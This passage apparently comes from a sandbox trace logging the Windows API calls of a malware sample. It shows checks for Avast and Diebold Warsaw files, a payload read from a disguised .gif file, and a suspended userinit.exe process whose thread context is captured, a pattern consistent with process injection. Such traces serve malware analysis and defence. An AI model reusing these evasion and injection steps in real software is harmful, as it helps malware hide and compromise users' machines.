[165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0250.893] ResumeThread (hThread=0x168) returned 0x1
[0250.893] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0250.893] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.893] GlobalUnlock (hMem=0x189000c) returned 0
[0250.894] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0250.894] GlobalUnlock (hMem=0x1890004) returned 0
[0250.902] Sleep (dwMilliseconds=0xe74e)
[0260.935] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0260.935] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0260.935] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0260.935] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0260.935] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170
[0260.935] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0260.935] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0260.935] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0260.935] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0260.938] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0260.938] ReadFile (in: hFile=0x170, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0260.940] CloseHandle (hObject=0x170) returned 1
[0260.940] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.941] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.941] GlobalUnlock (hMem=0x189000c) returned 0
[0260.941] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0260.941] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.942] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.942] GlobalUnlock (hMem=0x189000c) returned 0
[0260.942] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0260.943] GlobalLock (hMem=0x189000c) returned 0x25f110
[0260.943] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0260.944] GlobalUnlock (hMem=0x189000c) returned 0
[0260.944] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0260.944] GlobalLock (hMem=0x189000c) returned 0x265120
[0260.945] GlobalHandle (pMem=0x265120) returned 0x189000c
[0260.945] GlobalUnlock (hMem=0x189000c) returned 0
[0260.945] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0260.945] GlobalLock (hMem=0x189000c) returned 0x265120
[0260.945] GlobalHandle (pMem=0x265120) returned 0x189000c
[0260.945] GlobalUnlock (hMem=0x189000c) returned 0
[0260.946] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0260.946] GlobalLock (hMem=0x189000c) returned 0x26f130
[0260.947] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0260.947] GlobalUnlock (hMem=0x189000c) returned 0
[0260.947] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0260.947] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.948] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.948] GlobalUnlock (hMem=0x189000c) returned 0
[0260.948] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0260.948] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.948] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.948] GlobalUnlock (hMem=0x189000c) returned 0
[0260.948] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0260.949] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.949] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.949] GlobalUnlock (hMem=0x189000c) returned 0
[0260.949] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0260.949] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.950] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.950] GlobalUnlock (hMem=0x189000c) returned 0
[0260.950] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0260.950] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.951] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.951] GlobalUnlock (hMem=0x189000c) returned 0
[0260.951] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0260.951] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.952] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.952] GlobalUnlock (hMem=0x189000c) returned 0
[0260.952] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0260.952] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.952] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.952] GlobalUnlock (hMem=0x189000c) returned 0
[0260.952] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0260.952] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.953] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.953] GlobalUnlock (hMem=0x189000c) returned 0
[0260.953] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0260.953] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.954] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.954] GlobalUnlock (hMem=0x189000c) returned 0
[0260.954] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0260.954] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.955] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.955] GlobalUnlock (hMem=0x189000c) returned 0
[0260.955] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0260.956] GlobalLock (hMem=0x189000c) returned 0x27b110
[0260.957] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0260.957] GlobalUnlock (hMem=0x189000c) returned 0
[0260.957] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0260.957] GlobalLock (hMem=0x189000c) returned 0x27b110
[0260.958] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0260.958] GlobalUnlock (hMem=0x189000c) returned 0
[0260.958] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0260.959] GlobalLock (hMem=0x189000c) returned 0x29f120
[0260.960] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0260.960] GlobalUnlock (hMem=0x189000c) returned 0
[0260.960] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0260.960] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.961] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.961] GlobalUnlock (hMem=0x189000c) returned 0
[0260.961] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0260.961] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.961] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.961] GlobalUnlock (hMem=0x189000c) returned 0
[0260.961] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0260.962] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.962] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.962] GlobalUnlock (hMem=0x189000c) returned 0
[0260.962] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0260.962] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.963] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.963] GlobalUnlock (hMem=0x189000c) returned 0
[0260.963] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0260.963] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.964] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.964] GlobalUnlock (hMem=0x189000c) returned 0
[0260.964] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0260.964] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.964] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.965] GlobalUnlock (hMem=0x189000c) returned 0
[0260.965] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0260.965] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.965] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.965] GlobalUnlock (hMem=0x189000c) returned 0
[0260.965] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0260.965] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.966] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.966] GlobalUnlock (hMem=0x189000c) returned 0
[0260.966] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0260.966] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.967] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.967] GlobalUnlock (hMem=0x189000c) returned 0
[0260.967] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0260.967] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.968] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.968] GlobalUnlock (hMem=0x189000c) returned 0
[0260.968] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0260.968] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.968] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.968] GlobalUnlock (hMem=0x189000c) returned 0
[0260.968] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0260.968] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.969] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.969] GlobalUnlock (hMem=0x189000c) returned 0
[0260.969] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0260.969] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.970] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.970] GlobalUnlock (hMem=0x189000c) returned 0
[0260.970] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0260.970] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.971] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.971] GlobalUnlock (hMem=0x189000c) returned 0
[0260.971] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0260.971] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.971] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.971] GlobalUnlock (hMem=0x189000c) returned 0
[0260.971] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0260.971] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.972] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.972] GlobalUnlock (hMem=0x189000c) returned 0
[0260.972] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0260.972] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.973] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.973] GlobalUnlock (hMem=0x189000c) returned 0
[0260.973] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0260.973] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.974] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.974] GlobalUnlock (hMem=0x189000c) returned 0
[0260.974] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0260.974] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.974] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.974] GlobalUnlock (hMem=0x189000c) returned 0
[0260.974] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0260.974] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.975] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.975] GlobalUnlock (hMem=0x189000c) returned 0
[0260.975] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0260.975] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.976] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.976] GlobalUnlock (hMem=0x189000c) returned 0
[0260.976] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0260.976] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.977] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.977] GlobalUnlock (hMem=0x189000c) returned 0
[0260.977] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0260.977] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.977] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.977] GlobalUnlock (hMem=0x189000c) returned 0
[0260.977] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0260.977] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.978] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.978] GlobalUnlock (hMem=0x189000c) returned 0
[0260.978] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0260.978] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.979] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.979] GlobalUnlock (hMem=0x189000c) returned 0
[0260.979] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0260.979] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.980] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.980] GlobalUnlock (hMem=0x189000c) returned 0
[0260.980] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0260.980] GlobalLock (hMem=0x189000c) returned 0x25b100
[0260.981] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0260.981] GlobalUnlock (hMem=0x189000c) returned 0
[0260.981] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0260.981] GlobalLock (hMem=0x189000c) returned 0x25b100
[0261.029] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x16c, hThread=0x170, dwProcessId=0xba0, dwThreadId=0xb98)) returned 1
[0261.031] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0261.031] GetThreadContext (in: hThread=0x170, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd4000, Edx=0x0, Ecx=0x0, Eax=0x292be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14ff40, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, 